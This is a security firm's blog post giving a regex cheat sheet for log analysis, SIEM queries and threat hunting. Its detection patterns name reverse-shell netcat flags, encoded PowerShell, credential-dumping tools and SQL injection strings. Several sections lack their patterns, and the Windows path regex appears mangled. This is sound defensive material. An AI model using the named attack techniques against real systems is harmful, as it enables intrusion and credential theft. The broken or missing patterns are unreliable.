Blog

Regex Cheat Sheet: Complete Regular Expression Reference Guide 2026

Q: What is regex used for in cybersecurity?

Regex (regular expressions) in cybersecurity is used for log analysis, threat detection, pattern matching in SIEM tools like Microsoft Sentinel, parsing security events, validating input, detecting malicious patterns, analyzing network traffic, and automating incident response workflows. Security professionals use regex to search through vast amounts of log data to identify indicators of compromise, suspicious activity, and security anomalies.

Q: How do I match an IP address with regex?

To match an IP address with regex, use: \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b for a basic pattern, or \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b for strict validation. This pattern is essential for security log analysis, identifying source/destination IPs in firewall logs, detecting suspicious connection patterns, and parsing network traffic data.

Q: How do I use regex in Microsoft Sentinel?

In Microsoft Sentinel, use regex with the matches regex operator in KQL (Kusto Query Language). Example: SecurityEvent | where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\.exe' searches for suspicious executables in temp folders. Regex in Sentinel enables advanced threat hunting, log parsing, custom detection rules, and correlation of security events across your environment for comprehensive threat detection.

subrosa Security Team

January 28, 2026

Regular expressions (regex) are essential tools for cybersecurity professionals, enabling powerful pattern matching and text manipulation across SIEM platforms, log analysis systems, incident response workflows, and security automation. This comprehensive regex cheat sheet provides practical examples and patterns specifically designed for security operations, threat hunting, and digital forensics investigations.

What is Regex (Regular Expressions)?

Regular expressions (regex) are sequences of characters that define search patterns, used for pattern matching, text parsing, data validation, and string manipulation. In cybersecurity, regex enables SOC analysts to quickly search through massive volumes of security logs, identify indicators of compromise, detect anomalies, and automate threat detection across diverse data sources.

Why Security Professionals Need Regex:

Log analysis: Parse millions of security events to find specific patterns
Threat hunting: Search for IOCs (indicators of compromise) across log sources
SIEM queries: Write efficient detection rules in Microsoft Sentinel, Splunk, Elastic
Incident response: Extract relevant data during investigations
Automation: Build scripts for security workflows and response actions
Data validation: Ensure input meets security requirements

Basic Regex Syntax

Character Matchers

Pattern	Description	Security Example
`.`	Matches any single character except newline	`error.log` matches "error1log", "errorAlog"
`\d`	Matches any digit (0-9)	`port \d+` finds "port 443", "port 8080"
`\D`	Matches any non-digit	`\D+` extracts text between numbers
`\w`	Matches word characters (letters, digits, underscore)	`\w+@\w+\.com` matches simple emails
`\W`	Matches non-word characters	Useful for finding special characters in logs
`\s`	Matches whitespace (space, tab, newline)	`Failed\s+login` matches "Failed login"
`\S`	Matches non-whitespace	`\S+` extracts tokens without spaces

Quantifiers

Pattern	Description	Security Example
`*`	Matches 0 or more times	`error.*` matches "error", "error: timeout"
`+`	Matches 1 or more times	`\d+` matches "123", "4567" but not empty
`?`	Matches 0 or 1 time (optional)	`https?://` matches "http://" or "https://"
`{n}`	Matches exactly n times	`\d{4}` matches 4-digit years "2026"
`{n,}`	Matches n or more times	`[A-Z]{3,}` matches 3+ uppercase letters
`{n,m}`	Matches between n and m times	`\d{2,4}` matches 2-4 digit numbers

Anchors and Boundaries

Pattern	Description	Security Example
`^`	Matches start of line/string	`^ERROR` finds lines starting with "ERROR"
`$`	Matches end of line/string	`\.exe$` finds lines ending with ".exe"
`\b`	Word boundary	`\broot\b` matches "root" but not "groot"
`\B`	Non-word boundary	`\Broot\B` matches "groot" but not "root"

Cybersecurity-Specific Regex Patterns

IP Address Patterns

Basic IPv4:

\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b

Matches: 192.168.1.1, 10.0.0.1, 255.255.255.255

Strict IPv4 (validates 0-255 range):

\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b

IPv6:

([0-9a-fA-F]{0,4}:){7}[0-9a-fA-F]{0,4}

Email Address Patterns

Basic Email:

[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}

Advanced Email (RFC compliant):

(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])

URL Patterns

Basic URL:

https?://[^\s]+

Complete URL with validation:

https?://(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&//=]*)

Suspicious URL patterns (phishing detection):

https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}|https?://.*\.(?:tk|ml|ga|cf|gq)\b

File Path Patterns

Windows paths:

[a-zA-Z]:\$?:[^\\/:*?"<>|\r\n]+\$*[^\\/:*?"<>|\r\n]*

Matches: C:\Windows\System32\cmd.exe

Linux paths:

\/(?:[^\/\s]+\/)*[^\/\s]+

Matches: /var/log/auth.log

Suspicious temp file execution:

[a-zA-Z]:\\(?:Windows\\Temp|Users\\[^\\]+\\AppData\\Local\\Temp)\\.*\.exe

Hash Patterns (IOC Detection)

MD5:

\b[a-fA-F0-9]{32}\b

SHA1:

\b[a-fA-F0-9]{40}\b

SHA256:

\b[a-fA-F0-9]{64}\b

Authentication Patterns

Failed login attempts:

Privilege escalation:

Account lockout:

(?i)account.*(?:locked|disabled|suspended)

Malicious Command Patterns

PowerShell obfuscation:

powershell.*(?:-e|-enc|-encodedcommand|-w\s+hidden)

Command and Control (C2) indicators:

Suspicious network commands:

(?:netcat|nc|ncat).*(?:-e|-c\s+[/\\]bin[/\\](?:bash|sh))

Regex in SIEM Platforms

Microsoft Sentinel (KQL) Regex Examples

Find suspicious process execution:

SecurityEvent

| where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe'

Detect potential phishing emails:

EmailEvents

| where Subject matches regex '(?i)(urgent|action required|verify account|suspended)'

Identify lateral movement:

SecurityEvent

| where EventID == 4624

| where LogonType == 3

| where Account matches regex '.*\\\\admin.*'

Splunk Regex Examples

Extract failed SSH attempts:

source="/var/log/auth.log" "Failed password"

| rex field=_raw "Failed password for (?<user>\w+) from (?<src_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"

Parse Windows Security logs:

source="WinEventLog:Security" EventCode=4625

| rex field=Message "Account Name:\s+(?<failed_account>\S+)"

Advanced Regex Techniques

Lookahead and Lookbehind

Pattern	Description	Example
`(?=...)`	Positive lookahead	`password(?=\d)` matches "password" only if followed by digit
`(?!...)`	Negative lookahead	`user(?!admin)` matches "user" not followed by "admin"
`(?<=...)`	Positive lookbehind	`(?<=admin:)\w+` matches username after "admin:"
`(?<!...)`	Negative lookbehind	`(?<!test)\w+@domain\.com` excludes test accounts

Groups and Capturing

Pattern	Description	Security Use Case
`(...)`	Capturing group	Extract specific fields from logs
`(?:...)`	Non-capturing group	Group patterns without memory overhead
`(?<name>...)`	Named capturing group	`(?<ip>\d+\.\d+\.\d+\.\d+)` names the capture
`\1, \2`	Backreference	`(\w+)\s+\1` finds repeated words

Common Regex Flags

Flag	Description	Security Application
`i`	Case insensitive	Match "ERROR", "error", "Error" equally
`m`	Multiline (^ and $ match line breaks)	Parse multi-line log entries
`s`	Dotall (. matches newlines)	Search across multiple log lines
`g`	Global (find all matches)	Extract all IPs from text
`x`	Extended (ignore whitespace, allow comments)	Write readable complex patterns

Regex Performance Tips for Security Operations

Optimization Best Practices:

Use anchors: Start patterns with ^ to avoid scanning entire strings
Be specific: Use \d instead of . when you only need digits
Avoid catastrophic backtracking: Don't use nested quantifiers like (a+)+
Use non-capturing groups: (?:...) when you don't need to extract data
Compile patterns: Pre-compile frequently used regex in scripts
Limit scope: Use boundaries \b to prevent unnecessary matching
Test performance: Benchmark regex on sample logs before production use

Practical Threat Hunting Regex Examples

Detect Credential Dumping

(?i)(mimikatz|lsadump|sekurlsa|logonpasswords|procdump.*lsass)

Identifies tools and commands associated with credential theft

Find Ransomware Indicators

Matches common ransomware file extensions and ransom notes

Identify Data Exfiltration

Detects commands uploading data to cloud services

Detect Persistence Mechanisms

(?i)(?:HKLM|HKCU)\\(?:Software\\Microsoft\\Windows\\CurrentVersion\\Run|RunOnce)

Finds registry keys commonly used for persistence

Find SQL Injection Attempts

(?i)(\bunion\b.*\bselect\b|\bor\b.*1\s*=\s*1|'.*--|\bexec\s*\()

Identifies common SQL injection patterns in web logs

Testing and Debugging Regex

Recommended Regex Testing Tools:

Regex101.com: Excellent for testing with explanations and performance metrics
RegExr.com: Interactive testing with community patterns
RegexBuddy: Desktop application for complex pattern development
Python re module: Test patterns in your security scripts
Online Regex Testers: Quick validation before SIEM deployment

Common Regex Mistakes in Security Operations

Mistake	Problem	Solution
Greedy matching	`.*` matches too much	Use lazy `.*?` or specific patterns
Missing escapes	. matches any character	Escape special chars: `\.`
No anchors	Pattern matches anywhere	Use ^ and $ for specific positions
Inefficient patterns	Slow query performance	Optimize with specific character classes
Forgetting flags	Case-sensitive when shouldn't be	Add (?i) or /i flag for case-insensitive

Regex in Security Automation Scripts

Python Example: Extract IPs from Logs

      import re

# Read security log

with open('firewall.log', 'r') as f:

    content = f.read()

# Extract all IPs

ip_pattern = r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'

ips = re.findall(ip_pattern, content)

# Count unique source IPs

unique_ips = set(ips)

print(f"Found {len(unique_ips)} unique IP addresses")

PowerShell Example: Parse Windows Event Logs

      Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4625]]" | 

Select-Object -First 100 | 

Where-Object {$_.Message -match 'Account Name:\s+(?<user>\S+)'} | 

Select-Object TimeCreated, @{N='User';E={$Matches.user}}

Frequently Asked Questions

What is regex used for in cybersecurity?

Regex in cybersecurity is used for log analysis, threat detection, pattern matching in SIEM tools, parsing security events, validating input, detecting malicious patterns, analyzing network traffic, and automating incident response workflows. SOC analysts use regex daily to search through vast amounts of log data for indicators of compromise, suspicious activity, and security anomalies.

What does .* mean in regex?

In regex, .* means match any character (the dot .) zero or more times (the asterisk *). This creates a wildcard pattern that matches everything including empty strings. For example, 'error.*failure' matches 'error: system failure', 'error connection failure', or just 'errorfailure'. In security contexts, .* is commonly used in log queries to find events with specific keywords regardless of what appears between them, though it should be used carefully to avoid performance issues.

How do I match an IP address with regex?

To match an IP address with regex, use: \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b for a basic pattern that matches any number sequence in IP format, or \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b for strict validation that ensures each octet is between 0-255. This pattern is essential for security log analysis, identifying source/destination IPs in firewall logs, detecting suspicious connection patterns in network traffic, and extracting IPs during forensic investigations.

What is the difference between * and + in regex?

In regex, * (asterisk) matches zero or more occurrences, while + (plus) matches one or more occurrences. For example: 'a*' matches '', 'a', 'aa', 'aaa' (including empty string), but 'a+' only matches 'a', 'aa', 'aaa' (requires at least one 'a'). In security contexts, use + when you need to ensure a pattern appears at least once, such as when searching for actual error messages (ERROR.+) rather than empty fields, or when extracting usernames that must contain at least one character (\w+).

How do I use regex in Microsoft Sentinel?

In Microsoft Sentinel, use regex with the "matches regex" operator in KQL (Kusto Query Language). Example: SecurityEvent | where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe' searches for suspicious executables running from Windows temp folders. Regex in Sentinel enables advanced threat hunting, log parsing, custom detection rules, and correlation of security events across your environment for comprehensive threat detection. You can also use extract() and parse() functions with regex patterns for detailed log field extraction.

Conclusion: Master Regex for Security Operations

Regular expressions are indispensable tools for modern cybersecurity professionals. Whether you're a SOC analyst hunting threats in Microsoft Sentinel, a forensic investigator parsing evidence, or a security engineer building detection rules, mastering regex dramatically increases your efficiency and effectiveness.

This cheat sheet provides patterns and techniques specifically designed for security operations, but regex mastery comes through practice. Start with simple patterns, test thoroughly, and gradually build more complex expressions as your skills develop. Remember to optimize for performance, inefficient regex can impact SIEM query times and analysis speed during critical incident response situations.

subrosa's SOC team uses advanced regex patterns daily in Microsoft Sentinel for threat detection, log analysis, and automated response. Contact us to learn how our security experts can help optimize your detection rules and threat hunting workflows.

GET IN TOUCH

Need help with threat detection and security operations?

Our SOC team can help optimize your SIEM queries, build custom detection rules, and enhance your threat hunting capabilities with advanced regex patterns.

Contact Our Team